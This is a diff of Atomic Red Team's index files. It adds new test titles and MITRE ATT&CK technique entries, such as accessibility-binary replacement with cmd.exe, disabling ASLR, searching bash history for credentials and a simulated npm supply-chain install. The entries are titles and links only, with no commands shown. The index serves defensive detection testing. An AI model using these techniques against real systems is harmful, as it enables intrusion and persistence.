- Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
|
||||
- Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
|
||||
- Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
|
||||
- Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
|
||||
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
|
||||
- Atomic Test #1: Process Injection via C# [windows]
|
||||
- Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
|
||||
@@ -1218,6 +1226,7 @@
|
||||
- Atomic Test #2: Add launch script to launch daemon [macos]
|
||||
- Atomic Test #3: Add launch script to launch agent [macos]
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
|
||||
- Atomic Test #1: Install AppInit Shim [windows]
|
||||
@@ -1262,6 +1271,7 @@
|
||||
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
|
||||
- Atomic Test #1: At.exe Scheduled task [windows]
|
||||
- Atomic Test #2: At - Schedule a job [linux]
|
||||
- Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
|
||||
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
|
||||
- Atomic Test #1: Process Injection via mavinject.exe [windows]
|
||||
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
|
||||
@@ -1338,6 +1348,7 @@
|
||||
- Atomic Test #10: LNK Payload Download [windows]
|
||||
- Atomic Test #11: Mirror Blast Emulation [windows]
|
||||
- Atomic Test #12: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell [windows]
|
||||
- Atomic Test #13: Simulate Click-Fix via Downloaded BAT File [windows]
|
||||
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
|
||||
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
|
||||
@@ -1363,6 +1374,8 @@
|
||||
- T1674 Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1059 Command and Scripting Interpreter](../../T1059/T1059.md)
|
||||
- Atomic Test #1: AutoIt Script Execution [windows]
|
||||
- T1204.005 Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1677 Poisoned Pipeline Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1609 Kubernetes Exec Into Container](../../T1609/T1609.md)
|
||||
- Atomic Test #1: ExecIntoContainer [containers]
|
||||
- Atomic Test #2: Docker Exec Into Container [containers]
|
||||
@@ -1430,6 +1443,7 @@
|
||||
- [T1204.003 User Execution: Malicious Image](../../T1204.003/T1204.003.md)
|
||||
- Atomic Test #1: Malicious Execution from Mounted ISO Image [windows]
|
||||
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1059.013 Container CLI/API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
|
||||
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
|
||||
- Atomic Test #2: Execute Python via scripts [linux]
|
||||
@@ -1466,6 +1480,7 @@
|
||||
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
|
||||
- Atomic Test #1: At.exe Scheduled task [windows]
|
||||
- Atomic Test #2: At - Schedule a job [linux]
|
||||
- Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
|
||||
|
||||
# persistence
|
||||
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
|
||||
@@ -1704,6 +1719,7 @@
|
||||
- Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux]
|
||||
- Atomic Test #8: Create a new Windows admin user [windows]
|
||||
- Atomic Test #9: Create a new Windows admin user via .NET [windows]
|
||||
- Atomic Test #10: Create a Linux user via kubectl in a Pod [containers]
|
||||
- T1176.002 IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
|
||||
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
|
||||
@@ -1728,6 +1744,7 @@
|
||||
- Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
|
||||
- Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
|
||||
- Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
|
||||
- Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
|
||||
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
|
||||
- Atomic Test #1: Create a new Windows domain admin user [windows]
|
||||
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
|
||||
@@ -1857,6 +1874,7 @@
|
||||
- Atomic Test #3: Add launch script to launch agent [macos]
|
||||
- T1671 Cloud Application Integration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1197 BITS Jobs](../../T1197/T1197.md)
|
||||
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
|
||||
@@ -1907,6 +1925,7 @@
|
||||
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
|
||||
- Atomic Test #1: At.exe Scheduled task [windows]
|
||||
- Atomic Test #2: At - Schedule a job [linux]
|
||||
- Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
|
||||
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.017 Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
|
||||
@@ -2056,6 +2075,7 @@
|
||||
- Atomic Test #36: Windows push file using sftp.exe [windows]
|
||||
- Atomic Test #37: Windows pull file using sftp.exe [windows]
|
||||
- Atomic Test #38: Download a file with OneDrive Standalone Updater [windows]
|
||||
- Atomic Test #39: Curl Insecure Connection from a Pod [containers]
|
||||
- T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
|
||||
- Atomic Test #1: Steganographic Tarball Embedding [windows]
|
||||
@@ -2119,6 +2139,7 @@
|
||||
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
|
||||
- [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
|
||||
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
|
||||
- T1213.006 Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1119 Automated Collection](../../T1119/T1119.md)
|
||||
- Atomic Test #1: Automated Collection Command Prompt [windows]
|
||||
- Atomic Test #2: Automated Collection PowerShell [windows]
|
||||
@@ -2536,6 +2557,10 @@
|
||||
- Atomic Test #5: MSFT Get-GPO Cmdlet [windows]
|
||||
- [T1652 Device Driver Discovery](../../T1652/T1652.md)
|
||||
- Atomic Test #1: Device Driver Discovery [windows]
|
||||
- Atomic Test #2: Device Driver Discovery (Linux) [linux]
|
||||
- Atomic Test #3: Enumerate Kernel Driver Files (Linux) [linux]
|
||||
- Atomic Test #4: List loaded kernel extensions (macOS) [macos]
|
||||
- Atomic Test #5: Find Kernel Extensions (macOS) [macos]
|
||||
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
|
||||
- Atomic Test #1: Enumerate all accounts (Domain) [windows]
|
||||
- Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
|
||||
@@ -2603,6 +2628,10 @@
|
||||
- Atomic Test #2: System Service Discovery - net.exe [windows]
|
||||
- Atomic Test #3: System Service Discovery - systemctl/service [linux]
|
||||
- Atomic Test #4: Get-Service Execution [windows]
|
||||
- Atomic Test #5: System Service Discovery - macOS launchctl [macos]
|
||||
- Atomic Test #6: System Service Discovery - Windows Scheduled Tasks (schtasks) [windows]
|
||||
- Atomic Test #7: System Service Discovery - Services Registry Enumeration [windows]
|
||||
- Atomic Test #8: System Service Discovery - Linux init scripts [linux]
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
|
||||
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
|
||||
@@ -2681,6 +2710,7 @@
|
||||
- Atomic Test #40: Discover OS Build Number via Registry [windows]
|
||||
- [T1016.002 System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md)
|
||||
- Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh [windows]
|
||||
- T1518.002 Backup Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1010 Application Window Discovery](../../T1010/T1010.md)
|
||||
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
|
||||
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -2730,11 +2760,16 @@
|
||||
- Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
|
||||
- Atomic Test #6: Launch DirLister Executable [windows]
|
||||
- Atomic Test #7: ESXi - Enumerate VMDKs available on an ESXi Host [windows]
|
||||
- Atomic Test #8: Identifying Network Shares - Linux [linux]
|
||||
- Atomic Test #9: Recursive Enumerate Files And Directories By Powershell [windows]
|
||||
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
|
||||
- Atomic Test #1: System Network Connections Discovery [windows]
|
||||
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
|
||||
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
|
||||
- Atomic Test #4: System Discovery using SharpView [windows]
|
||||
- Atomic Test #3: System Network Connections Discovery via PowerShell (Process Mapping) [windows]
|
||||
- Atomic Test #4: System Network Connections Discovery via ss or lsof (Linux/MacOS) [linux, macos]
|
||||
- Atomic Test #5: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
|
||||
- Atomic Test #6: System Network Connections Discovery via sockstat (Linux, FreeBSD) [linux]
|
||||
- Atomic Test #7: System Discovery using SharpView [windows]
|
||||
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
|
||||
- Atomic Test #1: AWS S3 Enumeration [iaas:aws]
|
||||
@@ -2860,6 +2895,7 @@
|
||||
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1622 Debugger Evasion](../../T1622/T1622.md)
|
||||
- Atomic Test #1: Detect a Debugger Presence in the Machine [windows]
|
||||
- T1680 Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1124 System Time Discovery](../../T1124/T1124.md)
|
||||
- Atomic Test #1: System Time Discovery [windows]
|
||||
- Atomic Test #2: System Time Discovery - PowerShell [windows]
|
||||
@@ -2936,6 +2972,7 @@
|
||||
- T1589 Gather Victim Identity Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1595.002 Vulnerability Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1596 Search Open Technical Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1681 Search Threat Vendor Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1595 Active Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1589.002 Email Addresses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1598.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -2983,6 +3020,7 @@
|
||||
- Atomic Test #5: Linux - Stop service by killing process using killall [linux]
|
||||
- Atomic Test #6: Linux - Stop service by killing process using kill [linux]
|
||||
- Atomic Test #7: Linux - Stop service by killing process using pkill [linux]
|
||||
- Atomic Test #8: Abuse of linux magic system request key for Send a SIGTERM to all processes [linux]
|
||||
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -3087,7 +3125,8 @@
|
||||
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1195.002 Compromise Software Supply Chain](../../T1195.002/T1195.002.md)
|
||||
- Atomic Test #1: Simulate npm package installation on a Linux system [containers, linux]
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -165,7 +165,9 @@
|
||||
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1679 Selective Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1678 Delay Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1218.001 Signed Binary Proxy Execution: Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1070.005 Indicator Removal on Host: Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -182,7 +184,9 @@
|
||||
- Atomic Test #43: Disable Memory Swap [linux]
|
||||
- Atomic Test #47: Tamper with Defender ATP on Linux/MacOS [linux, macos]
|
||||
- Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI [linux]
|
||||
- Atomic Test #59: Disable ASLR Via sysctl parameters - Linux [linux]
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1036.012 Browser Fingerprint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -322,6 +326,7 @@
|
||||
- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -358,6 +363,7 @@
|
||||
- T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1674 Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1204.005 Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1059.001 Command and Scripting Interpreter: PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -458,6 +464,7 @@
|
||||
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -580,6 +587,7 @@
|
||||
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
|
||||
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
|
||||
- T1114.001 Email Collection: Local Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1213.006 Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1115 Clipboard Data](../../T1115/T1115.md)
|
||||
- Atomic Test #5: Add or copy content to clipboard with xClip [linux]
|
||||
@@ -681,6 +689,9 @@
|
||||
- T1003.005 OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
|
||||
- Atomic Test #1: Search Through Bash History [linux, macos]
|
||||
- Atomic Test #2: Search Through sh History [linux]
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #1: Find AWS credentials [macos, linux]
|
||||
- Atomic Test #3: Extract passwords with grep [linux, macos]
|
||||
@@ -721,7 +732,9 @@
|
||||
- Atomic Test #2: Check internet connection using ping freebsd, linux or macos [macos, linux]
|
||||
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1652 Device Driver Discovery](../../T1652/T1652.md)
|
||||
- Atomic Test #2: Device Driver Discovery (Linux) [linux]
|
||||
- Atomic Test #3: Enumerate Kernel Driver Files (Linux) [linux]
|
||||
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
|
||||
- Atomic Test #23: Active Directory Domain Search [linux]
|
||||
- Atomic Test #24: Account Enumeration with LDAPDomainDump [linux]
|
||||
@@ -739,6 +752,7 @@
|
||||
- Atomic Test #15: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS [linux]
|
||||
- [T1007 System Service Discovery](../../T1007/T1007.md)
|
||||
- Atomic Test #3: System Service Discovery - systemctl/service [linux]
|
||||
- Atomic Test #8: System Service Discovery - Linux init scripts [linux]
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
|
||||
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
|
||||
@@ -762,6 +776,7 @@
|
||||
- Atomic Test #25: Linux List Kernel Modules [linux]
|
||||
- Atomic Test #26: FreeBSD List Kernel Modules [linux]
|
||||
- T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1518.002 Backup Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1497.003 Time Based Evasion](../../T1497.003/T1497.003.md)
|
||||
@@ -777,8 +792,11 @@
|
||||
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
|
||||
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
|
||||
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
|
||||
- Atomic Test #8: Identifying Network Shares - Linux [linux]
|
||||
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
|
||||
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
|
||||
- Atomic Test #4: System Network Connections Discovery via ss or lsof (Linux/MacOS) [linux, macos]
|
||||
- Atomic Test #5: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
|
||||
- Atomic Test #6: System Network Connections Discovery via sockstat (Linux, FreeBSD) [linux]
|
||||
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1654 Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1057 Process Discovery](../../T1057/T1057.md)
|
||||
@@ -816,6 +834,7 @@
|
||||
- Atomic Test #12: Port Scan using nmap (Port range) [linux, macos]
|
||||
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1680 Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1124 System Time Discovery](../../T1124/T1124.md)
|
||||
- Atomic Test #3: System Time Discovery in FreeBSD/macOS [linux, macos]
|
||||
|
||||
@@ -832,6 +851,7 @@
|
||||
- Atomic Test #5: Linux - Stop service by killing process using killall [linux]
|
||||
- Atomic Test #6: Linux - Stop service by killing process using kill [linux]
|
||||
- Atomic Test #7: Linux - Stop service by killing process using pkill [linux]
|
||||
- Atomic Test #8: Abuse of linux magic system request key for Send a SIGTERM to all processes [linux]
|
||||
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -887,7 +907,8 @@
|
||||
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1195.002 Compromise Software Supply Chain](../../T1195.002/T1195.002.md)
|
||||
- Atomic Test #1: Simulate npm package installation on a Linux system [containers, linux]
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -131,7 +131,9 @@
|
||||
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1679 Selective Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1678 Delay Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1218.001 Signed Binary Proxy Execution: Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1070.005 Indicator Removal on Host: Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -143,6 +145,7 @@
|
||||
